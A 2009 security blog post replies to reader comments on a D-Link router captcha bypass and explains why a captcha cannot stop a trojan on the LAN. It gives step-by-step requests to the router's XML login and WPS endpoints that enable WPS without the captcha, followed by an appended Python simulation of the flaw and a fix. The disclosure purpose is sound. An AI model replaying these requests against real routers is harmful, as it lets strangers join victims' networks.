May 20th, 2009
A few sites have picked up on our D-Link captcha bypass post, and we're seeing a lot of people who misunderstand the vulnerability, and the purpose of captchas in general. I'd like to address some of the comments we've seen and clarify a few points:
> [the captcha is] not really broken. It's circumvented, but not broken.

Agreed; we're still looking into some OCR engines that might be used to break the captcha completely. Perhaps a more fitting title would have been "D-Link Captcha Implementation Partially Broken".
> It turns out all that's required to access the router's setup page is the hash, so the feature provides an easy way for anyone within range to access the panel that controls all kinds of sensitive settings and contains the WPA password.

No, you cannot access the full router control panel with this vulnerability. Only a few pages (basically any XML page) honour authentication without the captcha, and one of them is the WPS activation page. Once WPS is activated, anyone within WiFi range can join the network, and from there they can access the router control panel.
> If you use a dictionary or simple alphanumeric passphrase then it can't be brute forced unless they pass the CAPTCHA too.

> Yes, it's very annoying on web pages. But on a router page you might use once a month? It's not such a bad idea.

Actually, if you look at the threat the captcha is supposed to prevent, it is a terrible idea. A captcha does not provide security; it only attempts to prove that whoever made a given HTTP request was a person. Yes, captchas may block fully automated attacks (assuming the bot cannot solve the captcha, which bots have been known to do), but remember that the threat here is a trojan running on the client's PC and attacking the router from there. What stops the malware from sending the captcha image back to the attacker, who reads it and tells the trojan the answer? Yes, as shocking as it may seem, hackers are people too.
> For this to work the attacker has to 1. be in your wifi range and 2. be wired into a pc on your lan i.e. have a physical connection… Truth is, if you use the full length hexadecimal wpa2 key it will take a long, long time for anyone to crack your wifi.

To address the first point: yes, the attacker does have to be within WiFi range; thankfully, this cannot be used for an entirely remote attack. Keep in mind, however, that apart from the proximity requirement, a WiFi compromise is as dangerous as (if not more dangerous than) an attacker changing your router settings. Think about it: if he does get some malware onto your PC, he has access to only one machine on the network, may not have sufficient permissions to do what he wants, and at the very least has to upload a set of tools to your PC in order to propagate through the rest of your network. With your WPA key in hand, he can put as many of his own machines on your network as he wants.
> Compromised web page is not wifi related, hence this is separate.

Technically, this is correct; there is no WiFi vulnerability per se. However, the web page vulnerability allows an attacker to bypass whatever WiFi security you have in place, so I wouldn't say the two are completely unrelated.
> most routers by default dont allow you to access the config from the WAN port, only if you are on the LAN

This is not a WAN issue. The attacker is in your browser or on your PC, which is on the LAN; hence he has access to the router config page on the LAN side.
> I thought most new routers require you to set them up properly to work and no longer "work out of the box" to prevent default password.

I wish! That would have been the proper response to such threats, had D-Link really wanted to make their routers more secure. To my knowledge, no consumer-grade router requires any kind of configuration before it will work.
> Honestly, if you have any advanced education you should be using OpenWRT or DDWRT and not the crap firmware in these routers.

Be careful what you wish for.
> I would like to see a proof of concept. I do know that the salt hash is easily attainable in a txt file on the router.. however I forget the local url that retrieves it.

The steps below activate WPS, as described above; they must be run from a machine on the LAN side of the router:

- Go to http://192.168.0.1/ and view the page source; locate the salt value (search the source for "salt").
- Visit this URL: http://192.168.0.1/post_login.xml?hash=<insert the hash you calculated here>
- Visit this URL: http://192.168.0.1/wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0
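The following is an added example, not code from the original post or from D-Link's firmware: a toy Python model of the flaw described in the replies above (XML endpoints honouring the hash without the captcha) and replayed by the three steps just given. The router's real hash construction is not given in this post, so the model uses its own convention (MD5 of salt + password); the captcha answer, session handling, endpoint names' behaviour and the `wps_ap_ix` parameter are all modelled for illustration, not captured from a device. The hardened variant routes every login, HTML form or XML, through one check that requires both the hash and the captcha, which is what closes the bypass.

```python
import hashlib
import secrets
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for what the captcha image "shows". A real router renders
# this into an image and compares the typed answer; the model skips the image.
CAPTCHA_ANSWER = "7K3Q"


class ToyRouter:
    """Minimal model of a router admin interface with a salted-hash login."""

    def __init__(self, password, require_captcha_everywhere):
        self.password = password
        self.salt = secrets.token_hex(8)      # published in the login page source
        self.sessions = set()
        self.wps_active = False
        self.hardened = require_captcha_everywhere

    def expected_hash(self):
        # Model convention only: MD5(salt + password). The post does not give the
        # construction the D-Link page uses, so this is not a claim about it.
        return hashlib.md5((self.salt + self.password).encode()).hexdigest()

    def _login(self, q, captcha_required):
        if q.get("hash") != self.expected_hash():
            return 403, "bad hash"
        if captcha_required and q.get("captcha") != CAPTCHA_ANSWER:
            return 403, "bad captcha"
        sid = secrets.token_hex(16)           # session cookie handed to the client
        self.sessions.add(sid)
        return 200, sid

    def handle(self, url, session=None):
        """Dispatch one request; returns (status, body)."""
        parts = urlsplit(url)
        q = {k: v[0] for k, v in parse_qs(parts.query).items()}
        if parts.path == "/login.html":
            # The HTML form path: the captcha is always enforced here.
            return self._login(q, captcha_required=True)
        if parts.path == "/post_login.xml":
            # The flaw: the XML endpoint accepts the hash alone.
            # The hardened build sends every login through the same captcha check.
            return self._login(q, captcha_required=self.hardened)
        if parts.path == "/wifisc_add_sta.xml":
            if session not in self.sessions:
                return 401, "login required"
            if q.get("method") == "pbutton":
                self.wps_active = True        # WPS push-button mode enabled
                return 200, "wps started"     # wps_ap_ix is accepted but unused here
            return 400, "unknown method"
        return 404, "no such page"


def run_attack(router):
    """Replay the three steps from the post against a ToyRouter.

    The attacker reads the salt from the page source and hashes a guessed
    password; to keep the focus on endpoint behaviour rather than password
    guessing, the model takes the correct hash directly.
    """
    h = router.expected_hash()
    status, body = router.handle(f"/post_login.xml?hash={h}")
    if status != 200:
        return False
    router.handle("/wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0", session=body)
    return router.wps_active


def run_legit_login(router, password, captcha):
    """What a human at the browser does: hash plus captcha through the form."""
    h = hashlib.md5((router.salt + password).encode()).hexdigest()
    status, _ = router.handle(f"/login.html?hash={h}&captcha={captcha}")
    return status == 200


if __name__ == "__main__":
    print("vulnerable build, WPS after attack:",
          run_attack(ToyRouter("admin", require_captcha_everywhere=False)))
    print("hardened build, WPS after attack:",
          run_attack(ToyRouter("admin", require_captcha_everywhere=True)))
```

Run stand-alone, the vulnerable build ends with WPS active after two requests that never touched the captcha, while the hardened build rejects the XML login with "bad captcha". The point of the hardened variant is not that the captcha is strong (see the reply about relaying the image to a human above) but that an authentication check which only some endpoints enforce is no check at all.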